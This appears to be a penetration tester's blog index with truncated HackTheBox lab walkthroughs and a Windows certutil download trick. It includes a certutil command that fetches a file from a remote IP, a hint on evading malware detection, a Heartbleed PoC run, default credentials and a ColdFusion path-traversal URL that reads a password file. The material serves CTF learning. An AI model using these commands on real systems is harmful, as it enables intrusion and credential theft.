Pages

Search

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from https://www.bleepingcomputer.com. The trick is based on a base64 encoding file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon Run installation script $ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

HTB Active

$ sudo nmap -A -T4 -p- 10.10.10.100 Let’s enumerate SMB resources using SMBMap. $ smbmap -H 10.10.10.100 $ smbclient //10.10.10.100/Replication smb: > dir This share seems to be a copy of the SYSVOL’s. According to the information found in: Finding Passwords in SYSVOL & Exploiting Group Policy Preferences Attack Methods for Gaining Domain Admin Rights in Active Directory We need to find a file as groups.xml, scheduledtasks.xml and Services.xml where

HTB Sense

$ nmap -A -T4 -p- sense.htb $ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e We need to skip SSL certificate verification using -k option. $ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k $ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt We’ve found 2 text documents. changelog.txt system-users.txt Company defaults?As we have a PfSense site, we can try with default Pfsense password (pfsense) Access to http://10.10.10.60 This

HTB Valentine

$ sudo nmap -T4 -A -p- 10.10.10.79 $ gobuster dir -u https://10.10.10.79 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k $ nikto -h 10.10.10.79 $ sudo nmap –script vuln -p 80 10.10.10.79 $ sudo nmap –script vuln -p 443 10.10.10.79 Based on these results, this box is Heartbleed vulnerable. https://github.com/sensepost/heartbleed-poc $ python heartbleed-poc.py 10.10.10.79 $ strings dump.bin Using https://www.base64decode.org/ aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==heartbleedbelievethehype Access to https://10.10.10.79/dev https://10.10.10.79/dev/notes.txt https://10.10.10.79/dev/hype_key This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb We just have an Apache on port 80 and OpenSSH on port 2222. Access to http://shocker.htb ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e We have a cgi-bin folder that may contain script files. Let’s use again Gobuster but this time searching files by file type.(.sh,.py) $ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh Based on the box name

HTB Mirai

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- mirai.htb If we access to http://mirai.htb, There is another http port. Access to http://mirai.htb:32400 to be finally redirected to http://mirai.htb:32400/web/index.html As descrived by Nmap results, we have a Plex Media server. ruben@kali:~/htb/mirai$ gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e –wildcard Access to http://mirai.htb/admin/ So, do we have a Raspberry maybe using Raspbian?Default Raspbian credentials are pi:raspberry As we have SSH open, we can try

HTB Bank

ruben@kali:~/htb/bank$ nmap -sV -T4 -p- 10.10.10.29 There is an Apache 2.4.7 on port 80 and a DNS Server on port 53.If you access to http://10.10.10.29 there is an Apache2 default site. As there is a DNS Server active may seem worth if we add the hostname to the /etc/hosts.All HTB machines have the same pattern: Box_name.htb After this step, if we access to http://bank.htb we obtain a more promising site. ruben@kali:~/htb/bank$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

HTB Beep

$nmap -p- -T4 -A 10.10.10.7 Results: $gobuster dir -u 10.10.10.7:443 -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k Access to https://10.10.10.7/ So, this box contains an Elastix instance. According to Wikipedia description: Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing. The Elastix 2.5 functionality is

HTB Arctic

$sudo nmap -A -T4 -p- 10.10.10.11 8500/tcp open fmtp?This is an odd open port. Let’s check it. Access to http://10.10.10.11:8500/ These files are part of a Cold Fusion 8 installation.http://10.10.10.11:8500/CFIDE/administrator/ $searchsploit ColdFusion $searchsploit -x 14641 Access to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en What is Rds? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administratorand ColdFusion Studio to provide remote HTTP-access to files and databases.You can use RDS to manage